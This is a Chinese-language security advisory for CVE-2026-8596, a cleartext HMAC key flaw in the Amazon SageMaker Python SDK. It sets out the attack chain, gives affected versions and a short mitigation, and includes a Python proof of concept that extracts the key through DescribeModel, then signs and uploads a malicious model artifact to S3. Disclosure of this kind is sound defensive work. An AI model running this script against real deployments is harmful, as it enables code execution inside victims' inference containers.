CVE-2026-8596 Amazon SageMaker 敏感信息明文存储漏洞

漏洞信息

漏洞编号

CVE-2026-8596

漏洞类型

敏感信息泄露

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Amazon SageMaker Python SDK

漏洞概述

Amazon SageMaker Python SDK的ModelBuilder/Serve组件存在敏感信息明文存储漏洞，特定版本在处理模型构建和部署服务时，未加密HMAC签名密钥。拥有SageMaker describe API调用权限及模型工件S3写入权限的远程已认证攻击者，可从API响应中提取该密钥。攻击者利用窃取的密钥可伪造特制模型工件的完整性签名，最终导致在推理容器中实现任意代码执行，严重影响系统机密性、完整性和可用性。

技术细节

该漏洞源于Amazon SageMaker Python SDK中ModelBuilder/Serve组件的不安全配置。在受影响版本中，用于验证模型工件完整性的HMAC签名密钥被以明文形式存储在模型元数据或可访问的API响应中，未进行加密处理。攻击前提是攻击者必须拥有对SageMaker describe API的访问权限以及对模型工件S3路径的写入权限，这通常意味着攻击者已获得AWS环境的某种级别认证。利用过程包括：首先，攻击者通过DescribeModel或类似API接口获取包含明文HMAC密钥的响应数据；其次，攻击者利用该密钥对包含恶意代码（如反序列化Payload或恶意脚本）的特制模型工件进行签名；最后，攻击者将伪造的工件上传至S3存储桶的模型路径。由于SageMaker推理容器在加载模型时会验证签名，且验证密钥与攻击者持有的密钥一致，验证通过后恶意代码将在容器启动或推理时被执行，从而实现远程代码执行。

攻击链分析

STEP 1

1. 信息收集与权限获取

攻击者获取了AWS环境的认证凭证，具备调用SageMaker Describe API的权限以及对模型S3存储桶的写入权限。

STEP 2

2. 提取敏感信息

攻击者调用DescribeModel等API，从响应中提取出以明文存储的HMAC签名密钥。

STEP 3

3. 构造恶意载荷

攻击者创建包含恶意代码的模型工件，并使用窃取到的HMAC密钥对该工件进行签名，使其通过完整性校验。

STEP 4

4. 投递载荷

攻击者将伪造的模型工件上传至S3存储桶中的模型路径，覆盖或更新原有模型。

STEP 5

5. 执行代码

SageMaker推理容器加载模型时验证签名通过，解析并执行恶意载荷，导致在容器内实现远程代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import boto3
import hmac
import hashlib
import tarfile
import os

# Exploit Concept for CVE-2026-8596
# Requires: boto3, permissions for sagemaker:DescribeModel and s3:PutObject

# Configuration
MODEL_NAME = "target-vulnerable-model"
S3_BUCKET = "target-bucket"
MALICIOUS_MODEL_PATH = "./malicious_model.tar.gz"

# 1. Extract HMAC Key from SageMaker Describe API
def get_hmac_key(model_name):
    client = boto3.client('sagemaker')
    try:
        response = client.describe_model(ModelName=model_name)
        # The vulnerability is that the key is stored in cleartext here
        # Hypothetical key location based on vulnerability description
        hmac_key = response['PrimaryContainer']['Environment']['SAGEMAKER_HMAC_KEY']
        print(f"[+] Extracted HMAC Key: {hmac_key}")
        return hmac_key
    except Exception as e:
        print(f"[-] Error extracting key: {e}")
        return None

# 2. Create a malicious model artifact
def create_malicious_artifact():
    with tarfile.open(MALICIOUS_MODEL_PATH, "w:gz") as tar:
        # Add a simple malicious script (e.g., code.py)
        code_content = "import os; os.system('touch /tmp/pwned')"
        with open("code.py", "w") as f:
            f.write(code_content)
        tar.add("code.py")
    print(f"[+] Created malicious artifact at {MALICIOUS_MODEL_PATH}")

# 3. Sign the artifact with the stolen key
def sign_artifact(key, filepath):
    with open(filepath, 'rb') as f:
        data = f.read()
    signature = hmac.new(key.encode('utf-8'), data, hashlib.sha256).hexdigest()
    print(f"[+] Generated Signature: {signature}")
    return signature

# 4. Upload to S3 to trigger code execution
def upload_and_trigger(signature):
    s3 = boto3.client('s3')
    # Upload the file
    s3.upload_file(MALICIOUS_MODEL_PATH, S3_BUCKET, f"models/{MODEL_NAME}.tar.gz")
    # In a real scenario, the attacker might need to update the model reference
    # or wait for the inference container to pick up the new artifact.
    print(f"[+] Uploaded malicious model to s3://{S3_BUCKET}/models/{MODEL_NAME}.tar.gz")
    print("[*] If the model reloads, code execution will occur.")

if __name__ == "__main__":
    key = get_hmac_key(MODEL_NAME)
    if key:
        create_malicious_artifact()
        sig = sign_artifact(key, MALICIOUS_MODEL_PATH)
        upload_and_trigger(sig)

影响范围

Amazon SageMaker Python SDK < v2.257.2

Amazon SageMaker Python SDK v3 < v3.8.0

防御指南

临时缓解措施

限制对SageMaker Describe API和模型S3路径的访问权限，遵循最小权限原则，防止非授权用户获取HMAC密钥。